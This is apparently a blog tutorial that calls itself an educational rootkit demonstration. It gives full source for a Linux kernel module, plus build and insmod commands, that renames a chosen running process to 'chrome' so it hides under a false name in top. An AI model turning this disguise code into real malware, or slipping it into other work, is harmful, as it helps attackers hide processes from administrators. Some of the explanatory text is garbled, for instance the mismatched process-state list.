Linux Kernel Process Injection (Rootkit)

Process injection is a technique used by malware, rootkits, and other vulnerable software to run their malicious code inside an operating system. For example malicious software can appear in the task manager on Windows or in the $ top command in Linux as any name, for example, Chrome. Google The goal is to inject malicious code into a system process that runs at the inside with the highest privilege level (ring 0). The software running in the Linux Kernel is able to do anything, access the information of any ruined processes, and do any modification or change process scheduling. It can intercept and modify system calls to hide their presence, tamper with the system's security mechanisms, steal sensitive information, or even take over the entire system. rootkit kernel This article provides an example to show how easy it is to create a simple rootkit that will hide by itself inside of another process name. In the first step let's take a look, at how processes are organized in the Linux Operating System. Important Disclaimer: This article is for educational purposes only and to help security professionals and developers create safer software. This information should not be used for any purposes other than that. Process in Linux Each process inside the Linux Kernel has a unique process identifier (PID) assigned by the kernel in the process creation time. The PID is used to manage and monitor the process, for example during interprocess communication. The Linux kernel also has a process table which is implemented as a circular doubly linked list called the task list data structure, which stores information about each process, including the process's state, memory usage, and other relevant data. Each instance in the task list is a process descriptor of the type struct task_struct (file definition ). All mentioned information that is connected with the process is included here. The state field of the process descriptor describes the current condition which is the following: The process is currently running TASK_RUNNING: The process is currently sleeping TASK_INTERRUPTIBLE: Same as TASK_INTERRUPTIBLE except that it does not wake up and become runnable TASK_UNINTERRUPTIBLE: Process terminated but the parent still running TASK_ZOMBIE: Process is stopped TASK_STOPPE: Now that you’ve learned some basics about Linux Kernel process organization, let's start to edit them from the User space. Kernel module Implementation to replace process name First, we need to have a development environment to write, compile and run the kernel modules. These examples have been done in Ubuntu 20.04, but it’s similar in other distributions, so let’s update and upgrade our system and install all the necessary tools. $ sudo apt update && sudo apt upgrade $ sudo apt-get install gcc make build-essential libncurses-dev exuberant-ctags build-essential linux-headers-`uname -r` python3.8 Okay, now let’s create and run some Python script in our system, which is just a forever loop, and print something in the console. Create and edit the file HmmStress.py #!/usr/bin/python index = 0 while True: print("Hmmm!", index) if index >= 10000000: index = 0 index += 1 Let's run the script from ./ interpreter\ $./HmmStress.py And see the process information for this script by top command $ top Now, our mission is to hide this script from the system, But for that, we need to create some Linux Kernel module that will traverse through the process descriptor list, then find the HmmStress.py process and replace it with any text, for example, chrome. As a result in the system, our process will run by the name “chrome”. Edit the file ps_change.c #include // Contains macros and functions used to define and initialize kernel modules #include // printk function #include // Needs for loading, and unloading kernel modules. #include // Interrupt handling functions #include // Timer functions #include // Includes set of data structures, macros, and functions like task_struct #include // Working with process signals // MODULE_* macros. modules specifications MODULE_LICENSE("GPL"); MODULE_AUTHOR("Areg gasparyan"); MODULE_DESCRIPTION("Kernel process changer!"); MODULE_VERSION("0.1"); static struct hrtimer htimer; static ktime_t kt_periode; struct task_struct *task; // This function runs from high resolution timer callback as soon as possible static enum hrtimer_restart timer_function(struct hrtimer * timer) { for_each_process(task) { // traverse via all task structs if (strcmp(task->comm, "HmmStress.py") == 0) { // if we found our interested process strcpy(task->comm, "chrome"); // replace the name with chrome printk(KERN_INFO "pid: %d | replaced pname: %s\n", task->pid, task->comm); // print information in the system logs } } hrtimer_forward_now(timer, kt_periode); return HRTIMER_RESTART; } // Module initialization static int __init ps_change_start(void) { printk(KERN_INFO "Process changer loaded\n"); printk(KERN_INFO "Timer loaded.\n"); kt_periode = ktime_set(0, 104167); //seconds, nanoseconds hrtimer_init (& htimer, CLOCK_REALTIME, HRTIMER_MODE_REL); // init high resolution timer htimer.function = timer_function; hrtimer_start(& htimer, kt_periode, HRTIMER_MODE_REL); // Start high resolution timer return 0; } // Module deinitialization static void __exit ps_change_end(void) { printk(KERN_INFO "Process changer unloaded.\n"); hrtimer_cancel(& htimer); } // Setup init and exit static functions module_init(ps_change_start); module_exit(ps_change_end); Of course, we also need to create Makefile for the program. obj-m += ps_change.o all: make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules clean: make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean \Finally, let’s run make command and insert the module inside the Kernel $ make $ sudo insmod ps_change.ko At the end of file /var/log/syslog you can see the information printed from the kernel module. For the stop and remove module just need to run: $ sudo rmmod ps_change.ko This module uses high-resolution time which is the correct way to receive callbacks very fast for executing special functions. The alternative and not recommended way is the using while (true) loop but when you insert that kind of module inside the kernel you will never be able to kill them anymore. For fixation, you just need to restart the system. Manually inserted modules will be restored on the reboot. Final Thoughts This is just a simple example of working with the process in the Linux Kernel, the malicious rootkit could be very smart and it’s very difficult to detect and remove them from the kernel. There are a couple of tools that could be detected, and remove some kind of rootkits however they are able to detect mostly based on already founded rootkits. Also, rootkits are usually detected manually by highly qualified cybersecurity specialists who are specialized in rootkits.\ What did you think of this guide? Please let me know your thoughts in the comments below. Resources The Linux Kernel Module Programming Guide The lead image for this article was generated with Kadinsky 2 on HackerNoon. Prompt: Linux kernel

Linux Kernel Process Injection (Rootkit)

Too Long; Didn't Read

@areg

RELATED STORIES